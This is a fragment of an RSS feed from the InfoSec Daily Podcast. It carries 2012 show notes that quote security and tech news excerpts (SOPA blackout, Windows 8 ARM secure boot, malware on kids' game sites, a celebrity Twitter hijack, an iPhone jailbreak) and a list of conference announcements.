<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.csmonitor.com/USA/Society/2012/0117/Wikipedia-blackout-Why-even-supporters-question-anti-SOPA-move"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.csmonitor.com/USA/Society/2012/0117/Wikipedia-blackout-Why-even-supporters-question-anti-SOPA-move</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As the fracas over the proposed federal anti-privacy legislation known as SOPA heats up this week, the open-source encyclopedia website, Wikipedia, says it will shut down for 24 hours, beginning midnight Tuesday to protest what the website warns is a threat to free speech.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Instead of its usual homepage, users who navigate to the English-language Wikipedia Wednesday will find directions for reaching local members of Congress to protest the Stop Online Piracy Act (SOPA) and the Protect Intellectual Property Act (PIPA). Wikipedia founder Jimmy Wales said in a statement Monday, he hopes this &quot;will melt phone systems in Washington.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A House subcommittee was scheduled to prepare SOPA for a vote later this month. The Senate had planned a vote on PIPA even sooner. Now, it appears both votes could be delayed as some supporters in the House and Senate suggest they may be open changes in the bill.</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.readwriteweb.com/enterprise/2012/01/microsoft-says-no-to-disabling.php"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.readwriteweb.com/enterprise/2012/01/microsoft-says-no-to-disabling.php</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Remember last year when questions arose about Microsoft&#39;s policies on UEFI secure boot on Windows 8? Microsoft&#39;s response, or lack thereof, was that &quot;OEMs are free to choose&quot; how or whether to enable turning off secure boot on systems shipping Windows 8. It appears, however, OEMs may not be as free to choose if they&#39;re shipping ARM hardware.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Glyn Moody points out a clause from Microsoft&#39;s</span><a href="http://msdn.microsoft.com/library/windows/hardware/hh748188"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Hardware Certification Requirements</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> for Windows 8 on page 116, that says &quot;Disabling Secure MUST NOT be possible on ARM systems.&quot;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I&#39;d hoped to get some clarification from Microsoft, but no such luck. I contacted Microsoft&#39;s PR firm this morning and was told &quot;we have nothing more to share about UEFI at this time.&quot;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Moody paints this as a Microsoft vs. Linux situation, but does Microsoft really need to worry about Linux on tablets and phones? Perhaps there&#39;s a contingent that would try to boot Maemo, MeeGo, Tizen or whatever it&#39;s called this week, but in large enough numbers to threaten Microsoft? It seems doubtful.</span><img height="216px;" src="https://lh6.googleusercontent.com/lAnij0g63hPgaISRK5IgEPkujq8UPblCuFwtZU-FkVIqU014OawiFiYyJwwFUqx5466JXpZRDd3w714la2zG_1__rOv_kcv3DLjOfMiztqAw9_x-I20" width="697px;" /></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">So why prevent disabling secure boot? Aside from a reflexive lockdown on tablets and phones, you&#39;ve got me. Microsoft won&#39;t have the same kind of problems with copyright infringement on ARM devices it has on x86/AMD64 computers. If you buy a tablet or phone running Windows 8, you&#39;ve already paid for Windows, right?</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.techweekeurope.co.uk/news/hackers-hijack-the-register-and-the-telegraph-38660"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.techweekeurope.co.uk/news/hackers-hijack-the-register-and-the-telegraph-38660</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.dailymail.co.uk/sciencetech/article-2087257/Hackers-target-children-cartoon-gaming-websites-secretly-infect-parents-PCs.html?ITO=1490"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.dailymail.co.uk/sciencetech/article-2087257/Hackers-target-children-cartoon-gaming-websites-secretly-infect-parents-PCs.html?ITO=1490</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Children are the latest target for writers of computer viruses &#8211; seen as an easy &#39;way in&#39; to their parents PCs.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hackers are targeting children with sites that install malicious software on PCs, disguised as innocent-looking cartoon gaming websites.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But the sites quietly load programs onto the PCs which lurk in the background, which can steal information from adults, long after the children have logged off.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Children are the latest target for writers of computer viruses &#8211; seen as an easy &#39;way in&#39; to their parents PCs.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hackers are targeting children with sites that install malicious software on PCs, disguised as innocent-looking cartoon gaming websites.</span><img height="255px;" src="https://lh6.googleusercontent.com/oqtK_mSJWhC4CZmM0b2PUQq0vx-Z61Q7emsbTFTG7Gl1KdZVVSrA3RIvhzmNPeenf2ez-FnK9HB6pQYqAY3e1aT6zputfJG_ZxcYjEPL6Zx_uoJtXJY" width="233px;" /></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But the sites quietly load programs onto the PCs which lurk in the background, which can steal information from adults, long after the children have logged off.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Youngsters are seen as easy targets, because they &nbsp;will not stop and think before clicking on a link, whereas adults tend to be slightly more cautious.&nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Children are targeted using sites that offer free games &#8211; with one, CuteArcade.com reportedly infecting 12,600 computers, according to Czech security firm Avast virus lab.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:17px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Others such as HiddenNinjaGames.com also pose a risk, says the security firm.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://blogs.computerworld.com/19585/dumb_hacker_tweets_foursquare_location_while_hacking_ashton_kutcher"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blogs.computerworld.com/19585/dumb_hacker_tweets_foursquare_location_while_hacking_ashton_kutcher</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Idiots, the world is full of them and sometimes that includes stupid social media hackers. Poor password practices allow Twitter accounts to be compromised every day, but yesterday several high profile Twitter accounts were hacked, </span><a href="https://twitter.com/aplusk"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Ashton Kutcher</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the Huffington Post, and actor</span><a href="https://twitter.com/ericstonestreet/status/158397912974499840"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Eric Stonestreet</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. What makes this interesting is the degree of stupidity committed when hijacking Kutcher&#39;s account . . . at the very least, tweeting via a FourSquare check-in would be consider a dumb hack.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kutcher has over 9 million followers on Twitter and the alleged &quot;new&quot; relationship is what the hacker focused on to cause havoc. Of course all of the fake tweets have been deleted, but Ashton Kutcher (@aplusk) had both his FourSquare and connected Twitter acounts hacked. Those deleted false tweets were preserved and</span><a href="http://www.celebritytweet.com/aplusk/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">posted on Celebrity Tweet</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> which has the classy tagline of &quot;Stalk Celebrities on Twitter!&quot;</span><img height="441px;" src="https://lh6.googleusercontent.com/46FmdojH_cCryVb7yUZ0M7NfMBj3ZXbNVcx8EdLC_45wPujW1VAb8hc1Fnf-bPJcJROMAenBSfvHXBkOWZdtnRtI4D8PD7PzqXtLcbKRWgqJWFLzRic" width="667px;" /></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">No you can&#39;t find her house with the above links as they were deleted. While the hacker may have thought tweeting locations to Kutcher&#39;s alleged new love interest was clever, the hacker was not bright enough to realize his or her own location was broadcast via FourSquare. It took Kutcher about six hours to realize his accounts were compromised, but then he tweeted:</span><img height="287px;" src="https://lh4.googleusercontent.com/V4Kiv5e1MfzMLOhaSR9Y8ky951cZJUR5VVsrENqv3hDEIuCxmu4Nq8KlOB0eNFGDBjw7suEKHve1luaSANGY5QABrCKjM_sXc5LtXOO2uh_6oEml_sI" width="665px;" /></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Those tweets have also been deleted, but Kutcher&#39;s one warning remains. Whoops, it seems the not-too-smart social media hacker may be about to be Punk&#39;d.</span><img height="565px;" src="https://lh5.googleusercontent.com/qCBl5INlD7uRFLv0TjOwmTAjxDEqmU9ZUnQpNmRirmzC-vbZMn7Ek96eELYKJD6zjfw__x82jmYiUf75eY5Obgh27XD-lCOXZAkEEUXfbsg4DuYhjK4" width="675px;" /></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s certainly not the first time Kutcher&#39;s Twitter account has been compromised, but as an angel investor in many tech projects including Foursquare, it&#39;s unknown if this hack might be additionally embarrassing for him. </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://venturebeat.com/2012/01/16/iphone-4s-untethered-jailbreak/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://venturebeat.com/2012/01/16/iphone-4s-untethered-jailbreak/</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&rsquo;s taken longer than usual for hackers to release a complete jailbreak for the iPhone 4S, but it looks like one is almost here.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The above video by iOS hacker pod2G shows a fully untethered jailbreak &mdash; meaning the jailbreak is retained even after you reboot the phone &mdash; on an iPhone 4S running iOS 5.0.1. &ldquo;Only a few to wait now,&rdquo;</span><a href="http://pod2g-ios.blogspot.com/2012/01/4s-jailbreak.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">pod2G wrote on his blog</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, hinting that the hack is almost ready for release.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Jailbreaking your iPhone allows you to run unauthorized apps and customize your phone in an assortment of ways. It&rsquo;s a direct affront to Apple&rsquo;s heavily locked-down app ecosystem, so the company has made each new hardware and software release more difficult for hackers to jailbreak.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The iPhone 4S jailbreak was created by Dhowett of the hacker collective Chronic Dev Team. Pod2G was also responsible for the untethered iOS 5.0.1 jailbreak for devices other than the iPad 2 and iPhone 4S.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.cnet.com/8301-30685_3-57359663-264/free-windows-servers-float-onto-amazons-cloud"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-30685_3-57359663-264/free-windows-servers-float-onto-amazons-cloud</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anyone can download Linux for free, so it was no surprise that Amazon offered the open-source operating system on the free tier of Amazon Web Services.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But now the company has added a free version of Windows Server to the Elastic Compute Cloud (EC2) service, too.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We are excited to announce that starting today, the AWS Free Usage Tier will now include Amazon EC2 instances running Microsoft Windows Server,&quot; Amazon told EC2 customers today. &quot;Customers eligible for the AWS Free Usage tier can now use up to 750 hours per month of t1.micro instances running Microsoft Windows Server for free.&quot;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The offering competes directly with Microsoft&#39;s own Azure service. But it also serves to ensure that people just getting started with cloud computing will have Windows as an option.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-570-blackout-no-uefi-register-hijack-targeting-kids-dude-wheres-my-twitter-iphone-4s-jailbreak-near-windows-cloud/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3387/0/infosec-daily-podcast-episode-570.mp3" length="18463491" type="audio/mpeg" />
		<itunes:duration>0:38:25</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 570 for January 17, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 570 for January 17, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Anti PIPA/SOPA Meetup
	When: January 18, 2012
	Where: NY Tech Meetup HQ, New York City
	http://www.meetup.com/ny-tech/events/47879702/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	BSides Chicago
	When: Saturday, April 28th, 2012
	Where: Volcano Room (further info coming)
	Cost: Free (as always!) &#8211; Registration opening soon!
	http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
	They&#8217;re looking for sponsors, so if you know someone, pass it on.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 569 &#8211; Happy MLK, Death of SOPA?, DataExfil, Norton Source Code, Zappos, &amp; TeaMp0isoN</title>
		<link>http://www.isdpodcast.com/episode-569-happy-mlk-death-of-sopa-dataexfil-norton-source-code-zappos-teamp0ison</link>
		<comments>http://www.isdpodcast.com/episode-569-happy-mlk-death-of-sopa-dataexfil-norton-source-code-zappos-teamp0ison#comments</comments>
		<pubDate>Tue, 17 Jan 2012 01:50:00 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3382</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 569 for January 16, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, and Varun Sharma. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 569 for January 16, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
